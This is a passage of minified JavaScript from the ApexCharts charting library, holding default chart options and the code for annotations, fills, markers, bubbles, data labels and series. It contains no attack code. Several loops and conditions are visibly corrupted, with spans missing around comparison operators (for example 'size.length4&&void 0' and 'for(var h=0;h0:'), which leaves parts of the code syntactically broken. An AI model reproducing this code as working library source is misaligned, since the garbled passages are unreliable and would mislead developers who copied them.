0},stacked:!1,stackType:"normal",toolbar:{show:!0,offsetX:0,offsetY:0,tools:{download:!0,selection:!0,zoom:!0,zoomin:!0,zoomout:!0,pan:!0,reset:!0,customIcons:[]},export:{csv:{filename:void 0,columnDelimiter:",",headerCategory:"category",headerValue:"value",dateFormatter:function(e){return new Date(e).toDateString()}},png:{filename:void 0},svg:{filename:void 0}},autoSelected:"zoom"},type:"line",width:"100%",zoom:{enabled:!0,type:"x",autoScaleYaxis:!1,zoomedArea:{fill:{color:"#90CAF9",opacity:.4},stroke:{color:"#0D47A1",opacity:.4,width:1}}}},plotOptions:{area:{fillTo:"origin"},bar:{horizontal:!1,columnWidth:"70%",barHeight:"70%",distributed:!1,borderRadius:0,rangeBarOverlap:!0,rangeBarGroupRows:!1,colors:{ranges:[],backgroundBarColors:[],backgroundBarOpacity:1,backgroundBarRadius:0},dataLabels:{position:"top",maxItems:100,hideOverflowingLabels:!0,orientation:"horizontal"}},bubble:{minBubbleRadius:void 0,maxBubbleRadius:void 0},candlestick:{colors:{upward:"#00B746",downward:"#EF403C"},wick:{useFillColor:!0}},boxPlot:{colors:{upper:"#00E396",lower:"#008FFB"}},heatmap:{radius:2,enableShades:!0,shadeIntensity:.5,reverseNegativeShade:!1,distributed:!1,useFillColorAsStroke:!1,colorScale:{inverse:!1,ranges:[],min:void 0,max:void 0}},treemap:{enableShades:!0,shadeIntensity:.5,distributed:!1,reverseNegativeShade:!1,useFillColorAsStroke:!1,colorScale:{inverse:!1,ranges:[],min:void 0,max:void 0}},radialBar:{inverseOrder:!1,startAngle:0,endAngle:360,offsetX:0,offsetY:0,hollow:{margin:5,size:"50%",background:"transparent",image:void 0,imageWidth:150,imageHeight:150,imageOffsetX:0,imageOffsetY:0,imageClipped:!0,position:"front",dropShadow:{enabled:!1,top:0,left:0,blur:3,color:"#000",opacity:.5}},track:{show:!0,startAngle:void 0,endAngle:void 
0,background:"#f2f2f2",strokeWidth:"97%",opacity:1,margin:5,dropShadow:{enabled:!1,top:0,left:0,blur:3,color:"#000",opacity:.5}},dataLabels:{show:!0,name:{show:!0,fontSize:"16px",fontFamily:void 0,fontWeight:600,color:void 0,offsetY:0,formatter:function(e){return e}},value:{show:!0,fontSize:"14px",fontFamily:void 0,fontWeight:400,color:void 0,offsetY:16,formatter:function(e){return e+"%"}},total:{show:!1,label:"Total",fontSize:"16px",fontWeight:600,fontFamily:void 0,color:void 0,formatter:function(e){return e.globals.seriesTotals.reduce((function(e,a){return e+a}),0)/e.globals.series.length+"%"}}}},pie:{customScale:1,offsetX:0,offsetY:0,startAngle:0,endAngle:360,expandOnClick:!0,dataLabels:{offset:0,minAngleToShowLabel:10},donut:{size:"65%",background:"transparent",labels:{show:!1,name:{show:!0,fontSize:"16px",fontFamily:void 0,fontWeight:600,color:void 0,offsetY:-10,formatter:function(e){return e}},value:{show:!0,fontSize:"20px",fontFamily:void 0,fontWeight:400,color:void 0,offsetY:10,formatter:function(e){return e}},total:{show:!1,showAlways:!1,label:"Total",fontSize:"16px",fontWeight:400,fontFamily:void 0,color:void 0,formatter:function(e){return e.globals.seriesTotals.reduce((function(e,a){return e+a}),0)}}}}},polarArea:{rings:{strokeWidth:1,strokeColor:"#e8e8e8"},spokes:{strokeWidth:1,connectorColors:"#e8e8e8"}},radar:{size:void 0,offsetX:0,offsetY:0,polygons:{strokeWidth:1,strokeColors:"#e8e8e8",connectorColors:"#e8e8e8",fill:{colors:void 0}}}},colors:void 0,dataLabels:{enabled:!0,enabledOnSeries:void 0,formatter:function(e){return null!==e?e:""},textAnchor:"middle",distributed:!1,offsetX:0,offsetY:0,style:{fontSize:"12px",fontFamily:void 0,fontWeight:600,colors:void 0},background:{enabled:!0,foreColor:"#fff",borderRadius:2,padding:4,opacity:.9,borderWidth:1,borderColor:"#fff",dropShadow:{enabled:!1,top:1,left:1,blur:1,color:"#000",opacity:.45}},dropShadow:{enabled:!1,top:1,left:1,blur:1,color:"#000",opacity:.45}},fill:{type:"solid",colors:void 0,opacity:.85,gradient:{shade:"dark",type:"horizontal",shadeIntensity:.5,gradientToColors:void 0,inverseColors:!0,opacityFrom:1,opacityTo:1,stops:[0,50,100],colorStops:[]},image:{src:[],width:void 0,height:void 0},pattern:{style:"squares",width:6,height:6,strokeWidth:2}},forecastDataPoints:{count:0,fillOpacity:.5,strokeWidth:void 0,dashArray:4},grid:{show:!0,borderColor:"#e0e0e0",strokeDashArray:0,position:"back",xaxis:{lines:{show:!1}},yaxis:{lines:{show:!0}},row:{colors:void 0,opacity:.5},column:{colors:void 0,opacity:.5},padding:{top:0,right:10,bottom:0,left:12}},labels:[],legend:{show:!0,showForSingleSeries:!1,showForNullSeries:!0,showForZeroSeries:!0,floating:!1,position:"bottom",horizontalAlign:"center",inverseOrder:!1,fontSize:"12px",fontFamily:void 0,fontWeight:400,width:void 0,height:void 0,formatter:void 0,tooltipHoverFormatter:void 0,offsetX:-20,offsetY:4,customLegendItems:[],labels:{colors:void 0,useSeriesColors:!1},markers:{width:12,height:12,strokeWidth:0,fillColors:void 0,strokeColor:"#fff",radius:12,customHTML:void 0,offsetX:0,offsetY:0,onClick:void 0},itemMargin:{horizontal:5,vertical:2},onItemClick:{toggleDataSeries:!0},onItemHover:{highlightDataSeries:!0}},markers:{discrete:[],size:0,colors:void 0,strokeColors:"#fff",strokeWidth:2,strokeOpacity:.9,strokeDashArray:0,fillOpacity:1,shape:"circle",width:8,height:8,radius:2,offsetX:0,offsetY:0,onClick:void 0,onDblClick:void 0,showNullDataPoints:!0,hover:{size:void 0,sizeOffset:3}},noData:{text:void 0,align:"center",verticalAlign:"middle",offsetX:0,offsetY:0,style:{color:void 
0,fontSize:"14px",fontFamily:void 0}},responsive:[],series:void 0,states:{normal:{filter:{type:"none",value:0}},hover:{filter:{type:"lighten",value:.1}},active:{allowMultipleDataPointsSelection:!1,filter:{type:"darken",value:.5}}},title:{text:void 0,align:"left",margin:5,offsetX:0,offsetY:0,floating:!1,style:{fontSize:"14px",fontWeight:900,fontFamily:void 0,color:void 0}},subtitle:{text:void 0,align:"left",margin:5,offsetX:0,offsetY:30,floating:!1,style:{fontSize:"12px",fontWeight:400,fontFamily:void 0,color:void 0}},stroke:{show:!0,curve:"smooth",lineCap:"butt",width:2,colors:void 0,dashArray:0},tooltip:{enabled:!0,enabledOnSeries:void 0,shared:!0,followCursor:!1,intersect:!1,inverseOrder:!1,custom:void 0,fillSeriesColor:!1,theme:"light",cssClass:"",style:{fontSize:"12px",fontFamily:void 0},onDatasetHover:{highlightDataSeries:!1},x:{show:!0,format:"dd MMM",formatter:void 0},y:{formatter:void 0,title:{formatter:function(e){return e?e+": ":""}}},z:{formatter:void 0,title:"Size: "},marker:{show:!0,fillColors:void 0},items:{display:"flex"},fixed:{enabled:!1,position:"topRight",offsetX:0,offsetY:0}},xaxis:{type:"category",categories:[],convertedCatToNumeric:!1,offsetX:0,offsetY:0,overwriteCategories:void 0,labels:{show:!0,rotate:-45,rotateAlways:!1,hideOverlappingLabels:!0,trim:!1,minHeight:void 0,maxHeight:120,showDuplicates:!0,style:{colors:[],fontSize:"12px",fontWeight:400,fontFamily:void 0,cssClass:""},offsetX:0,offsetY:0,format:void 0,formatter:void 0,datetimeUTC:!0,datetimeFormatter:{year:"yyyy",month:"MMM 'yy",day:"dd MMM",hour:"HH:mm",minute:"HH:mm:ss",second:"HH:mm:ss"},group:{groups:[],style:{colors:[],fontSize:"12px",fontWeight:400,fontFamily:void 0,cssClass:""}}},axisBorder:{show:!0,color:"#e0e0e0",width:"100%",height:1,offsetX:0,offsetY:0},axisTicks:{show:!0,color:"#e0e0e0",height:6,offsetX:0,offsetY:0},tickAmount:void 0,tickPlacement:"on",min:void 0,max:void 0,range:void 0,floating:!1,decimalsInFloat:void 0,position:"bottom",title:{text:void 0,offsetX:0,offsetY:0,style:{color:void 0,fontSize:"12px",fontWeight:900,fontFamily:void 0,cssClass:""}},crosshairs:{show:!0,width:1,position:"back",opacity:.9,stroke:{color:"#b6b6b6",width:1,dashArray:3},fill:{type:"solid",color:"#B1B9C4",gradient:{colorFrom:"#D8E3F0",colorTo:"#BED1E6",stops:[0,100],opacityFrom:.4,opacityTo:.5}},dropShadow:{enabled:!1,left:0,top:0,blur:1,opacity:.4}},tooltip:{enabled:!0,offsetY:0,formatter:void 0,style:{fontSize:"12px",fontFamily:void 0}}},yaxis:this.yAxis,theme:{mode:"light",palette:"palette1",monochrome:{enabled:!1,color:"#008FFB",shadeTo:"light",shadeIntensity:.65}}}}}]),e}(),T=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.graphics=new S(this.ctx),this.w.globals.isBarHorizontal&&(this.invertAxis=!0),this.helpers=new w(this),this.xAxisAnnotations=new M(this),this.yAxisAnnotations=new j(this),this.pointsAnnotations=new C(this),this.w.globals.isBarHorizontal&&this.w.config.yaxis[0].reversed&&(this.inversedReversedAxis=!0),this.xDivision=this.w.globals.gridWidth/this.w.globals.dataPoints}return u(e,[{key:"drawAxesAnnotations",value:function(){var e=this.w;if(e.globals.axisCharts){for(var 
a=this.yAxisAnnotations.drawYAxisAnnotations(),n=this.xAxisAnnotations.drawXAxisAnnotations(),i=this.pointsAnnotations.drawPointAnnotations(),t=e.config.chart.animations.enabled,r=[a,n,i],o=[n.node,a.node,i.node],s=0;s<3;s++)e.globals.dom.elGraphical.add(r[s]),!t||e.globals.resized||e.globals.dataChanged||"scatter"!==e.config.chart.type&&"bubble"!==e.config.chart.type&&e.globals.dataPoints>1&&o[s].classList.add("apexcharts-element-hidden"),e.globals.delayedElements.push({el:o[s],index:0});this.helpers.annotationsBackground()}}},{key:"drawImageAnnos",value:function(){var e=this;this.w.config.annotations.images.map((function(a,n){e.addImage(a,n)}))}},{key:"drawTextAnnos",value:function(){var e=this;this.w.config.annotations.texts.map((function(a,n){e.addText(a,n)}))}},{key:"addXaxisAnnotation",value:function(e,a,n){this.xAxisAnnotations.addXaxisAnnotation(e,a,n)}},{key:"addYaxisAnnotation",value:function(e,a,n){this.yAxisAnnotations.addYaxisAnnotation(e,a,n)}},{key:"addPointAnnotation",value:function(e,a,n){this.pointsAnnotations.addPointAnnotation(e,a,n)}},{key:"addText",value:function(e,a){var n=e.x,i=e.y,t=e.text,r=e.textAnchor,o=e.foreColor,s=e.fontSize,l=e.fontFamily,u=e.fontWeight,c=e.cssClass,d=e.backgroundColor,h=e.borderWidth,p=e.strokeDashArray,m=e.borderRadius,f=e.borderColor,v=e.appendTo,g=void 0===v?".apexcharts-annotations":v,b=e.paddingLeft,k=void 0===b?4:b,y=e.paddingRight,x=void 0===y?4:y,S=e.paddingBottom,A=void 0===S?2:S,w=e.paddingTop,M=void 0===w?2:w,j=this.w,C=this.graphics.drawText({x:n,y:i,text:t,textAnchor:r||"start",fontSize:s||"12px",fontWeight:u||"regular",fontFamily:l||j.config.chart.fontFamily,foreColor:o||j.config.chart.foreColor,cssClass:c}),P=j.globals.dom.baseEl.querySelector(g);P&&P.appendChild(C.node);var B=C.bbox();if(t){var T=this.graphics.drawRect(B.x-k,B.y-M,B.width+k+x,B.height+A+M,m,d||"transparent",1,h,f,p);P.insertBefore(T.node,C.node)}}},{key:"addImage",value:function(e,a){var n=this.w,i=e.path,t=e.x,r=void 0===t?0:t,o=e.y,s=void 0===o?0:o,l=e.width,u=void 0===l?20:l,c=e.height,d=void 0===c?20:c,h=e.appendTo,p=void 0===h?".apexcharts-annotations":h,m=n.globals.dom.Paper.image(i);m.size(u,d).move(r,s);var f=n.globals.dom.baseEl.querySelector(p);return f&&f.appendChild(m.node),m}},{key:"addXaxisAnnotationExternal",value:function(e,a,n){return this.addAnnotationExternal({params:e,pushToMemory:a,context:n,type:"xaxis",contextMethod:n.addXaxisAnnotation}),n}},{key:"addYaxisAnnotationExternal",value:function(e,a,n){return this.addAnnotationExternal({params:e,pushToMemory:a,context:n,type:"yaxis",contextMethod:n.addYaxisAnnotation}),n}},{key:"addPointAnnotationExternal",value:function(e,a,n){return void 0===this.invertAxis&&(this.invertAxis=n.w.globals.isBarHorizontal),this.addAnnotationExternal({params:e,pushToMemory:a,context:n,type:"point",contextMethod:n.addPointAnnotation}),n}},{key:"addAnnotationExternal",value:function(e){var a=e.params,n=e.pushToMemory,i=e.context,t=e.type,r=e.contextMethod,o=i,s=o.w,l=s.globals.dom.baseEl.querySelector(".apexcharts-".concat(t,"-annotations")),u=l.childNodes.length+1,c=new B,d=Object.assign({},"xaxis"===t?c.xAxisAnnotation:"yaxis"===t?c.yAxisAnnotation:c.pointAnnotation),h=k.extend(d,a);switch(t){case"xaxis":this.addXaxisAnnotation(h,l,u);break;case"yaxis":this.addYaxisAnnotation(h,l,u);break;case"point":this.addPointAnnotation(h,l,u)}var p=s.globals.dom.baseEl.querySelector(".apexcharts-".concat(t,"-annotations 
.apexcharts-").concat(t,"-annotation-label[rel='").concat(u,"']")),m=this.helpers.addBackgroundToAnno(p,h);return m&&l.insertBefore(m.node,p),n&&s.globals.memory.methodsToExec.push({context:o,id:h.id?h.id:k.randomId(),method:r,label:"addAnnotation",params:a}),i}},{key:"clearAnnotations",value:function(e){var a=e.w,n=a.globals.dom.baseEl.querySelectorAll(".apexcharts-yaxis-annotations, .apexcharts-xaxis-annotations, .apexcharts-point-annotations");a.globals.memory.methodsToExec.map((function(e,n){"addText"!==e.label&&"addAnnotation"!==e.label||a.globals.memory.methodsToExec.splice(n,1)})),n=k.listToArray(n),Array.prototype.forEach.call(n,(function(e){for(;e.firstChild;)e.removeChild(e.firstChild)}))}},{key:"removeAnnotation",value:function(e,a){var n=e.w,i=n.globals.dom.baseEl.querySelectorAll(".".concat(a));i&&(n.globals.memory.methodsToExec.map((function(e,i){e.id===a&&n.globals.memory.methodsToExec.splice(i,1)})),Array.prototype.forEach.call(i,(function(e){e.parentElement.removeChild(e)})))}}]),e}(),L=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.opts=null,this.seriesIndex=0}return u(e,[{key:"clippedImgArea",value:function(e){var a=this.w,n=a.config,i=parseInt(a.globals.gridWidth,10),t=parseInt(a.globals.gridHeight,10),r=i>t?i:t,o=e.image,s=0,l=0;void 0===e.width&&void 0===e.height?void 0!==n.fill.image.width&&void 0!==n.fill.image.height?(s=n.fill.image.width+1,l=n.fill.image.height):(s=r+1,l=r):(s=e.width,l=e.height);var u=document.createElementNS(a.globals.SVGNS,"pattern");S.setAttrs(u,{id:e.patternID,patternUnits:e.patternUnits?e.patternUnits:"userSpaceOnUse",width:s+"px",height:l+"px"});var c=document.createElementNS(a.globals.SVGNS,"image");u.appendChild(c),c.setAttributeNS(window.SVG.xlink,"href",o),S.setAttrs(c,{x:0,y:0,preserveAspectRatio:"none",width:s+"px",height:l+"px"}),c.style.opacity=e.opacity,a.globals.dom.elDefs.node.appendChild(u)}},{key:"getSeriesIndex",value:function(e){var a=this.w;return("bar"===a.config.chart.type||"rangeBar"===a.config.chart.type)&&a.config.plotOptions.bar.distributed||"heatmap"===a.config.chart.type||"treemap"===a.config.chart.type?this.seriesIndex=e.seriesNumber:this.seriesIndex=e.seriesNumber%a.globals.series.length,this.seriesIndex}},{key:"fillPath",value:function(e){var a=this.w;this.opts=e;var n,i,t,r=this.w.config;this.seriesIndex=this.getSeriesIndex(e);var o=this.getFillColors()[this.seriesIndex];void 0!==a.globals.seriesColors[this.seriesIndex]&&(o=a.globals.seriesColors[this.seriesIndex]),"function"==typeof o&&(o=o({seriesIndex:this.seriesIndex,dataPointIndex:e.dataPointIndex,value:e.value,w:a}));var s=this.getFillType(this.seriesIndex),l=Array.isArray(r.fill.opacity)?r.fill.opacity[this.seriesIndex]:r.fill.opacity;e.color&&(o=e.color);var u=o;if(-1===o.indexOf("rgb")?o.length<9&&(u=k.hexToRgba(o,l)):o.indexOf("rgba")>-1&&(l=k.getOpacityFromRGBA(o)),e.opacity&&(l=e.opacity),"pattern"===s&&(i=this.handlePatternFill(i,o,l,u)),"gradient"===s&&(t=this.handleGradientFill(o,l,this.seriesIndex)),"image"===s){var c=r.fill.image.src,d=e.patternID?e.patternID:"";this.clippedImgArea({opacity:l,image:Array.isArray(c)?e.seriesNumber-1&&(c=k.getOpacityFromRGBA(u));var d=void 0===t.fill.gradient.opacityTo?a:Array.isArray(t.fill.gradient.opacityTo)?t.fill.gradient.opacityTo[n]:t.fill.gradient.opacityTo;if(void 
0===t.fill.gradient.gradientToColors||0===t.fill.gradient.gradientToColors.length)i="dark"===t.fill.gradient.shade?s.shadeColor(-1*parseFloat(t.fill.gradient.shadeIntensity),e.indexOf("rgb")>-1?k.rgb2hex(e):e):s.shadeColor(parseFloat(t.fill.gradient.shadeIntensity),e.indexOf("rgb")>-1?k.rgb2hex(e):e);else if(t.fill.gradient.gradientToColors[r.seriesNumber]){var h=t.fill.gradient.gradientToColors[r.seriesNumber];i=h,h.indexOf("rgba")>-1&&(d=k.getOpacityFromRGBA(h))}else i=e;if(t.fill.gradient.inverseColors){var p=u;u=i,i=p}return u.indexOf("rgb")>-1&&(u=k.rgb2hex(u)),i.indexOf("rgb")>-1&&(i=k.rgb2hex(i)),o.drawGradient(l,u,i,c,d,r.size,t.fill.gradient.stops,t.fill.gradient.colorStops,n)}}]),e}(),z=function(){function e(a,n){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"setGlobalMarkerSize",value:function(){var e=this.w;if(e.globals.markers.size=Array.isArray(e.config.markers.size)?e.config.markers.size:[e.config.markers.size],e.globals.markers.size.length>0){if(e.globals.markers.size.length4&&void 0!==arguments[4]&&arguments[4],o=this.w,s=a,l=e,u=null,c=new S(this.ctx),d=o.config.markers.discrete&&o.config.markers.discrete.length;if((o.globals.markers.size[a]>0||r||d)&&(u=c.group({class:r||d?"":"apexcharts-series-markers"})).attr("clip-path","url(#gridRectMarkerMask".concat(o.globals.cuid,")")),Array.isArray(l.x))for(var h=0;h0:o.config.markers.size>0;if(f||r||d){k.isNumber(l.y[h])?m+=" w".concat(k.randomId()):m="apexcharts-nullpoint";var v=this.getMarkerConfig({cssClass:m,seriesIndex:a,dataPointIndex:p});o.config.series[s].data[p]&&(o.config.series[s].data[p].fillColor&&(v.pointFillColor=o.config.series[s].data[p].fillColor),o.config.series[s].data[p].strokeColor&&(v.pointStrokeColor=o.config.series[s].data[p].strokeColor)),i&&(v.pSize=i),(t=c.drawMarker(l.x[h],l.y[h],v)).attr("rel",p),t.attr("j",p),t.attr("index",a),t.node.setAttribute("default-marker-size",v.pSize);var g=new x(this.ctx);g.setSelectionFilter(t,a,p),this.addEvents(t),u&&u.add(t)}else void 0===o.globals.pointsArray[a]&&(o.globals.pointsArray[a]=[]),o.globals.pointsArray[a].push([l.x[h],l.y[h]])}return u}},{key:"getMarkerConfig",value:function(e){var a=e.cssClass,n=e.seriesIndex,i=e.dataPointIndex,t=void 0===i?null:i,r=e.finishRadius,o=void 0===r?null:r,s=this.w,l=this.getMarkerStyle(n),u=s.globals.markers.size[n],c=s.config.markers;return null!==t&&c.discrete.length&&c.discrete.map((function(e){e.seriesIndex===n&&e.dataPointIndex===t&&(l.pointStrokeColor=e.strokeColor,l.pointFillColor=e.fillColor,u=e.size,l.pointShape=e.shape)})),{pSize:null===o?u:o,pRadius:c.radius,width:Array.isArray(c.width)?c.width[n]:c.width,height:Array.isArray(c.height)?c.height[n]:c.height,pointStrokeWidth:Array.isArray(c.strokeWidth)?c.strokeWidth[n]:c.strokeWidth,pointStrokeColor:l.pointStrokeColor,pointFillColor:l.pointFillColor,shape:l.pointShape||(Array.isArray(c.shape)?c.shape[n]:c.shape),class:a,pointStrokeOpacity:Array.isArray(c.strokeOpacity)?c.strokeOpacity[n]:c.strokeOpacity,pointStrokeDashArray:Array.isArray(c.strokeDashArray)?c.strokeDashArray[n]:c.strokeDashArray,pointFillOpacity:Array.isArray(c.fillOpacity)?c.fillOpacity[n]:c.fillOpacity,seriesIndex:n}}},{key:"addEvents",value:function(e){var a=this.w,n=new 
S(this.ctx);e.node.addEventListener("mouseenter",n.pathMouseEnter.bind(this.ctx,e)),e.node.addEventListener("mouseleave",n.pathMouseLeave.bind(this.ctx,e)),e.node.addEventListener("mousedown",n.pathMouseDown.bind(this.ctx,e)),e.node.addEventListener("click",a.config.markers.onClick),e.node.addEventListener("dblclick",a.config.markers.onDblClick),e.node.addEventListener("touchstart",n.pathMouseDown.bind(this.ctx,e),{passive:!0})}},{key:"getMarkerStyle",value:function(e){var a=this.w,n=a.globals.markers.colors,i=a.config.markers.strokeColor||a.config.markers.strokeColors;return{pointStrokeColor:Array.isArray(i)?i[e]:i,pointFillColor:Array.isArray(n)?n[e]:n}}}]),e}(),N=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.initialAnim=this.w.config.chart.animations.enabled,this.dynamicAnim=this.initialAnim&&this.w.config.chart.animations.dynamicAnimation.enabled}return u(e,[{key:"draw",value:function(e,a,n){var i=this.w,t=new S(this.ctx),r=n.realIndex,o=n.pointsPos,s=n.zRatio,l=n.elParent,u=t.group({class:"apexcharts-series-markers apexcharts-series-".concat(i.config.chart.type)});if(u.attr("clip-path","url(#gridRectMarkerMask".concat(i.globals.cuid,")")),Array.isArray(o.x))for(var c=0;cf.maxBubbleRadius&&(m=f.maxBubbleRadius)}i.config.chart.animations.enabled||(p=m);var v=o.x[c],g=o.y[c];if(p=p||0,null!==g&&void 0!==i.globals.series[r][d]||(h=!1),h){var b=this.drawPoint(v,g,p,m,r,d,a);u.add(b)}l.add(u)}}},{key:"drawPoint",value:function(e,a,n,i,t,r,o){var s=this.w,l=t,u=new y(this.ctx),c=new x(this.ctx),d=new L(this.ctx),h=new z(this.ctx),p=new S(this.ctx),m=h.getMarkerConfig({cssClass:"apexcharts-marker",seriesIndex:l,dataPointIndex:r,finishRadius:"bubble"===s.config.chart.type||s.globals.comboCharts&&s.config.series[t]&&"bubble"===s.config.series[t].type?i:null});i=m.pSize;var f,v=d.fillPath({seriesNumber:t,dataPointIndex:r,color:m.pointFillColor,patternUnits:"objectBoundingBox",value:s.globals.series[t][o]});if("circle"===m.shape?f=p.drawCircle(n):"square"!==m.shape&&"rect"!==m.shape||(f=p.drawRect(0,0,m.width-m.pointStrokeWidth/2,m.height-m.pointStrokeWidth/2,m.pRadius)),s.config.series[l].data[r]&&s.config.series[l].data[r].fillColor&&(v=s.config.series[l].data[r].fillColor),f.attr({x:e-m.width/2-m.pointStrokeWidth/2,y:a-m.height/2-m.pointStrokeWidth/2,cx:e,cy:a,fill:v,"fill-opacity":m.pointFillOpacity,stroke:m.pointStrokeColor,r:i,"stroke-width":m.pointStrokeWidth,"stroke-dasharray":m.pointStrokeDashArray,"stroke-opacity":m.pointStrokeOpacity}),s.config.chart.dropShadow.enabled){var g=s.config.chart.dropShadow;c.dropShadow(f,g,t)}if(!this.initialAnim||s.globals.dataChanged||s.globals.resized)s.globals.animationEnded=!0;else{var b=s.config.chart.animations.speed;u.animateMarker(f,0,"circle"===m.shape?i:{width:m.width,height:m.height},b,s.globals.easing,(function(){window.setTimeout((function(){u.animationCompleted(f)}),100)}))}if(s.globals.dataChanged&&"circle"===m.shape)if(this.dynamicAnim){var k,A,w,M,j=s.config.chart.animations.dynamicAnimation.speed;null!=(M=s.globals.previousPaths[t]&&s.globals.previousPaths[t][o])&&(k=M.x,A=M.y,w=void 0!==M.r?M.r:i);for(var C=0;Cs.globals.gridHeight+d&&(a=s.globals.gridHeight+d/2),void 0===s.globals.dataLabelsRects[i]&&(s.globals.dataLabelsRects[i]=[]),s.globals.dataLabelsRects[i].push({x:e,y:a,width:c,height:d});var h=s.globals.dataLabelsRects[i].length-2,p=void 0!==s.globals.lastDrawnDataLabelsIndexes[i]?s.globals.lastDrawnDataLabelsIndexes[i][s.globals.lastDrawnDataLabelsIndexes[i].length-1]:0;if(void 
0!==s.globals.dataLabelsRects[i][h]){var m=s.globals.dataLabelsRects[i][p];(e>m.x+m.width+2||a>m.y+m.height+2||e+c4&&void 0!==arguments[4]?arguments[4]:2,r=this.w,o=new S(this.ctx),s=r.config.dataLabels,l=0,u=0,c=n,d=null;if(!s.enabled||!Array.isArray(e.x))return d;d=o.group({class:"apexcharts-data-labels"});for(var h=0;ha.globals.gridWidth+f.textRects.width+10)&&(s="");var v=a.globals.dataLabels.style.colors[r];(("bar"===a.config.chart.type||"rangeBar"===a.config.chart.type)&&a.config.plotOptions.bar.distributed||a.config.dataLabels.distributed)&&(v=a.globals.dataLabels.style.colors[o]),"function"==typeof v&&(v=v({series:a.globals.series,seriesIndex:r,dataPointIndex:o,w:a})),h&&(v=h);var g=d.offsetX,b=d.offsetY;if("bar"!==a.config.chart.type&&"rangeBar"!==a.config.chart.type||(g=0,b=0),f.drawnextLabel){var k=n.drawText({width:100,height:parseInt(d.style.fontSize,10),x:i+g,y:t+b,foreColor:v,textAnchor:l||d.textAnchor,text:s,fontSize:u||d.style.fontSize,fontFamily:d.style.fontFamily,fontWeight:d.style.fontWeight||"normal"});if(k.attr({class:"apexcharts-datalabel",cx:i,cy:t}),d.dropShadow.enabled){var y=d.dropShadow;new x(this.ctx).dropShadow(k,y)}c.add(k),void 0===a.globals.lastDrawnDataLabelsIndexes[r]&&(a.globals.lastDrawnDataLabelsIndexes[r]=[]),a.globals.lastDrawnDataLabelsIndexes[r].push(o)}}}},{key:"addBackgroundToDataLabel",value:function(e,a){var n=this.w,i=n.config.dataLabels.background,t=i.padding,r=i.padding/2,o=a.width,s=a.height,l=new S(this.ctx).drawRect(a.x-t,a.y-r/2,o+2*t,s+r,i.borderRadius,"transparent"===n.config.chart.background?"#fff":n.config.chart.background,i.opacity,i.borderWidth,i.borderColor);return i.dropShadow.enabled&&new x(this.ctx).dropShadow(l,i.dropShadow),l}},{key:"dataLabelsBackground",value:function(){var e=this.w;if("bubble"!==e.config.chart.type)for(var a=e.globals.dom.baseEl.querySelectorAll(".apexcharts-datalabels text"),n=0;nn.globals.gridHeight&&(c=n.globals.gridHeight-h)),{bcx:o,bcy:r,dataLabelsX:a,dataLabelsY:c}}},{key:"calculateBarsDataLabelsPosition",value:function(e){var a=this.w,n=e.x,i=e.i,t=e.j,r=e.bcy,o=e.barHeight,s=e.barWidth,l=e.textRects,u=e.dataLabelsX,c=e.strokeWidth,d=e.barDataLabelsConfig,h=e.offX,p=e.offY,m=a.globals.gridHeight/a.globals.dataPoints;s=Math.abs(s);var f=r-(this.barCtx.isRangeBar?0:m)+o/2+l.height/2+p-3,v=this.barCtx.series[i][t]<0,g=n;switch(this.barCtx.isReversed&&(g=n+s-(v?2*s:0),n=a.globals.gridWidth-s),d.position){case"center":u=v?g+s/2-h:Math.max(l.width/2,g-s/2)+h;break;case"bottom":u=v?g+s-c-Math.round(l.width/2)-h:g-s+c+Math.round(l.width/2)+h;break;case"top":u=v?g-c+Math.round(l.width/2)-h:g-c-Math.round(l.width/2)+h}return a.config.chart.stacked||(u<0?u=u+l.width+c:u+l.width/2>a.globals.gridWidth&&(u=a.globals.gridWidth-l.width-c)),{bcx:n,bcy:r,dataLabelsX:u,dataLabelsY:f}}},{key:"drawCalculatedDataLabels",value:function(e){var a=e.x,n=e.y,i=e.val,t=e.i,o=e.j,s=e.textRects,l=e.barHeight,u=e.barWidth,c=e.dataLabelsConfig,d=this.w,h="rotate(0)";"vertical"===d.config.plotOptions.bar.dataLabels.orientation&&(h="rotate(-90, ".concat(a,", ").concat(n,")"));var p=new E(this.barCtx.ctx),m=new S(this.barCtx.ctx),f=c.formatter,v=null,g=d.globals.collapsedSeriesIndices.indexOf(t)>-1;if(c.enabled&&!g){v=m.group({class:"apexcharts-data-labels",transform:h});var b="";void 0!==i&&(b=f(i,{seriesIndex:t,dataPointIndex:o,w:d}));var 
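/* Illustrative sketch of the data-label collision test above: each drawn label's
   rect is remembered in dataLabelsRects, and a new label is drawn only when it
   clears the previously drawn label by a small margin. The extracted text is
   truncated around the third clause, so that clause is an assumption here. */
function labelFits(x, y, width, height, last) {
  // last: the previously drawn label's rect {x, y, width, height}
  return x > last.x + last.width + 2 ||   // starts right of the last label
         y > last.y + last.height + 2 ||  // starts below the last label
         x + width < last.x;              // ends left of it (assumed clause)
}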
k=d.globals.series[t][o]<0,y=d.config.plotOptions.bar.dataLabels.position;"vertical"===d.config.plotOptions.bar.dataLabels.orientation&&("top"===y&&(c.textAnchor=k?"end":"start"),"center"===y&&(c.textAnchor="middle"),"bottom"===y&&(c.textAnchor=k?"end":"start")),this.barCtx.isRangeBar&&this.barCtx.barOptions.dataLabels.hideOverflowingLabels&&uMath.abs(u)&&(b=""):s.height/1.6>Math.abs(l)&&(b=""));var x=r({},c);this.barCtx.isHorizontal&&i<0&&("start"===c.textAnchor?x.textAnchor="end":"end"===c.textAnchor&&(x.textAnchor="start")),p.plotDataLabelsText({x:a,y:n,text:b,i:t,j:o,parent:v,dataLabelsConfig:x,alwaysDrawDataLabel:!0,offsetCorrection:!0})}return v}}]),e}(),K=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.legendInactiveClass="legend-mouseover-inactive"}return u(e,[{key:"getAllSeriesEls",value:function(){return this.w.globals.dom.baseEl.getElementsByClassName("apexcharts-series")}},{key:"getSeriesByName",value:function(e){return this.w.globals.dom.baseEl.querySelector(".apexcharts-inner .apexcharts-series[seriesName='".concat(k.escapeString(e),"']"))}},{key:"isSeriesHidden",value:function(e){var a=this.getSeriesByName(e),n=parseInt(a.getAttribute("data:realIndex"),10);return{isHidden:a.classList.contains("apexcharts-series-collapsed"),realIndex:n}}},{key:"addCollapsedClassToSeries",value:function(e,a){var n=this.w;function i(n){for(var i=0;i0&&void 0!==arguments[0])||arguments[0],a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=!(arguments.length>2&&void 